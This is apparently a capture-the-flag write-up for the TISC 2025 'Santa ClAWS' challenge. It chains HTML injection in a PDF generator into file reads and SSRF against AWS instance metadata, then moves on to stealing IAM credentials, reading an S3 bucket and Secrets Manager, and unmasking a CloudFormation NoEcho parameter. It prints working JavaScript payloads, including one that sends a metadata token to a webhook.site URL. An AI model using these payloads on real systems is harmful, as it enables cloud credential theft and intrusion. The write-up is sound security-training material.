Santa ClAWS
This seemingly innocent site may be hiding something deeper — a covert cloud operations backend. Scratch beneath the surface. Unravel the yarn of lies. Every cat may hold a clue. http://santa-claws.chals.tisc25.ctf.sg
After completing Level 6, players are given the option to pick between a Web-oriented route and a Rev-oriented route for the next two levels. I picked the former, which started with this Cloud/Web challenge. Funnily enough, the last Cloud challenge I did was set by the same author and also in TISC, but 3 years ago. While I may not have improved much in my Cloud ability since then, LLMs thankfully have.
The site is a PDF generator. We can specify a name, a description, and an email, which will be injected into a PDF template and returned to us.
Arbitrary content injection is always suspicious, and trying a few payloads reveal that the template is susceptible to raw HTML injection. For example, if we supply the name <h2>dummyname</h2>
, the name in the PDF is displayed in a larger font.
HTML injection via PDF renderer is a classic CTF challenge (see: Nahamcon CTF 2022 Hacker Ts). This grants us traditional SSRF capabilities. In fact, we can even obtain LFI using this HacksTricks payload
1
2
3
4
5
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write('<div style="width:100%;white-space:pre-wrap; word-break:break-all;">'+btoa(this.responseText)+'</div>')};
x.open("GET","file:///etc/passwd");x.send();
</script>
Use the CSS style to prevent longer file contents from running off the PDF.
But what file to read? Examining the site’s page source gives us the hint <!-- TODO: Verify the systemd service config for runtime ports (done) -->
. Performing some enumeration, we find that the systemd config file /etc/systemd/system/santaclaws.service
exists.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[Unit]
Description=Gunicorn service for Flask app
After=network.target
[Service]
User=ubuntu
Group=www-data
WorkingDirectory=/home/ubuntu/app
Environment="PATH=/home/ubuntu/app/venv/bin"
Environment="PROXY_PORT=45198"
ExecStart=/home/ubuntu/app/venv/bin/gunicorn --workers 3 --bind 127.0.0.1:8000 --timeout 120 app:app
Restart=always
RestartSec=5
MemoryMax=1G
[Install]
WantedBy=multi-user.target
Interesting, looks like there is a proxy running on port 45198.
Now that we know the working directory, we can use the LFI to leak the server’s source code. Here’s the first section of code:
1
2
3
4
5
6
7
8
9
config = pdfkit.configuration(wkhtmltopdf='/usr/bin/wkhtmltopdf')
app = Flask(__name__)
CORS(app, resources={r"/*": {"origins": "*"}},
allow_headers=["X-aws-ec2-metadata-token-ttl-seconds"],
methods=["GET","POST","PUT","OPTIONS"])
with open('static/certificate.png', 'rb') as img_file:
encoded_img = base64.b64encode(img_file.read()).decode("utf-8")
encoded_img = encoded_img.replace("\n","")
The interesting part is the CORS allowed header! This hints at a typical Cloud SSRF attack to steal cloud credentials. From the challenge name “ClAWS”, we can assume that the server is running out of AWS (confirmed via IP lookup). AWS instances can access the Instance Metadata Service (IMDS), an internal endpoint for looking up AWS metadata, including credentials. This is at the endpoint http://169.254.169.254/latest/meta-data/. Crucially, it is only accessible from within the AWS instance. So, the SSRF should allow us to extract this information.
Trying to access that URL directly will fail, however. Instead, sending the request via the proxy works. In other words, we send the metadata request to the internal proxy at http://127.0.0.1:45198/latest/meta-data/iam
. We have to first obtain a IMDSv2 token to perform IMDS operations. The CORS setting allows us to do this.
1
2
3
4
5
6
7
8
9
10
11
12
<script>
var readfile = new XMLHttpRequest();
var exfil = new XMLHttpRequest();
readfile.open("PUT","http://127.0.0.1:45198/latest/api/token", true);
readfile.setRequestHeader("X-aws-ec2-metadata-token-ttl-seconds", "21600");
readfile.onload = function() {
var url = "https://webhook.site/5f286926-c220-499c-817c-8322d56f7730?data="+btoa(this.response);
exfil.open("GET", url, true);
exfil.send();
};
readfile.send();
</script>
Using that token, we can then obtain IAM credentials for the claws-ec2
role. This will allow us to authenticate as that role and perform authorized actions. Performing further enumeration, we can leak user-data, which is the custom startup script that the EC2 instance runs. This reveals the existence of an S3 bucket:
1
2
3
4
5
# Define variables
APP_DIR="/home/ubuntu/app"
ZIP_FILE="app.zip"
S3_BUCKET="s3://claws-web-setup-bucket"
VENV_DIR="$APP_DIR/venv"
Let’s check it out.
1
2
3
4
5
6
7
# aws s3 ls s3://claws-web-setup-bucket --region ap-southeast-1
2025-09-09 08:27:47 1179203 app.zip
2025-09-09 08:21:42 34 flag1.txt
root@gc:/host_owned/ctf/tisc25/lvl7# aws s3 cp s3://claws-web-setup-bucket/flag1.txt . --region ap-southeast-1
download: s3://claws-web-setup-bucket/flag1.txt to ./flag1.txt
root@gc:/host_owned/ctf/tisc25/lvl7# cat flag1.txt
TISC{iMPURrf3C7_sSRFic473_Si73_4nd
Great. But that’s only part 1 of the flag. We can continue enumerating for the current role using pacu. This reveals two things. Firstly, there is a secret API key in the Secrets Manager.
1
2
3
4
5
6
7
8
9
10
11
aws secretsmanager get-secret-value --secret-id internal_web_api_key-t7au98 --region ap-southeast-1
{
"ARN": "arn:aws:secretsmanager:ap-southeast-1:533267020068:secret:internal_web_api_key-t7au98-2SPiPW",
"Name": "internal_web_api_key-t7au98",
"VersionId": "terraform-20250909082140200100000004",
"SecretString": "{\"api_key\":\"54ul3yrF4p3mc7S4dhf0yy0AY5GQWd15\"}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": 1757406100.327
}
Secondly, there are 2 EC2 instances running. The first is the public web server that hosts the PDF generator. The second is a private internal server.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
aws ec2 describe-instances --region ap-southeast-1
<...>
"RootDeviceName": "/dev/sda1",
"RootDeviceType": "ebs",
"SecurityGroups": [
{
"GroupId": "sg-0bb5643e275d678e5",
"GroupName": "internal-ec2-sg"
}
],
"SourceDestCheck": true,
"Tags": [
{
"Key": "Name",
"Value": "claws-internal"
}
],
<...>
We will likely have to perform lateral movement to get the second part of the flag. While we can’t directly access the internal server, we can use the SSRF to send a request to the internal IP. This reveals a “CloudOps Internal Tool” site. The site supports two endpoints. One, to generate a stack with the supplied API key. Two, to check a URL.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
const statusEl = document.getElementById("stack_status");
const healthStatusEl = document.getElementById("health_status");
const urlInput = document.getElementById("url_input");
function get_stack() {
fetch(`/api/generate-stack?api_key=${apiKey}`)
.then(res => res.json())
.then(data => {
if (data.stackId) {
statusEl.textContent = `Stack created: ${data.stackId}`;
} else {
statusEl.textContent = `Error: ${data.error || 'Unknown'}`;
console.error(data);
}
})
.catch(err => {
statusEl.textContent = "Request failed";
console.error(err);
});
}
function check_url() {
const url = urlInput.value;
if (!url) {
healthStatusEl.textContent = "Please enter a URL";
return;
}
fetch(`/api/healthcheck?url=${encodeURIComponent(url)}`)
.then(res => res.json())
.then(data => {
if (data.status === "up") {
healthStatusEl.textContent = "Site is up";
} else {
healthStatusEl.textContent = `Site is down: ${data.error}`;
}
})
.catch(err => {
healthStatusEl.textContent = "Healthcheck failed";
console.error(err);
});
}
The Javascript source for the internal site.
For the generate stack endpoint, it requires an API key. This brings to mind the secret API key we found earlier. We can continue using the SSRF to make requests to this internal API, which will allow us to successfully create a stack. In the context of AWS, this stack likely refers to a CloudFormation stack. However, we don’t have permissions to view the stack as our current role.
Instead, we have to use the healthcheck endpoint to perform a second SSRF to obtain a new set of credentials. We use this SSRF to get credentials tied to the internal instance instead. With this new role, we can successfully query the stack and describe it. Here, we see that the stack contains a parameter flagpt2
but it is censored. Examining the stack template, we can see why:
1
2
3
4
5
6
7
8
aws cloudformation get-template --stack-name pawxy-sandbox-616d8aee --region ap-southeast-1
{
"TemplateBody": "AWSTemplateFormatVersion: '2010-09-09'\nDescription: >\n Flag part 2\n\nParameters:\n flagpt2:\n Type: String\n NoEcho: true\nResources:\n AppDataStore:\n Type: AWS::S3::Bucket\n Properties:\n BucketName: !Sub app-data-sandbox-bucket\n\n ",
"StagesAvailable": [
"Original",
"Processed"
]
}
The parameter has noecho
set to true, which masks the parameter. Bypassing this is another common Cloud challenge. Simply create a new template file with “NoEcho” removed.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
AWSTemplateFormatVersion: '2010-09-09'
Description: >
Flag part 2
Parameters:
flagpt2:
Type: String
# Removed NoEcho: true
Outputs:
FlagValue:
Description: 'The flag value'
Value: !Ref flagpt2
Resources:
AppDataStore:
Type: AWS::S3::Bucket
Properties:
BucketName: !Sub 'app-data-sandbox-bucket-${AWS::StackId}'
We can then push this as an update to the template with: aws cloudformation update-stack --stack-name pawxy-sandbox-616d8aee --region ap-southeast-1 --template-body file://template.yaml --capabilities CAPABILITY_IAM --disable-rollback --parameters ParameterKey=flagpt2,UsePreviousValue=true
. This unmasks the parameter value, revealing the second part of the flag.
Flag: TISC{iMPURrf3C7_sSRFic473_Si73_4nd_c47_4S7r0PHiC_fL4w5}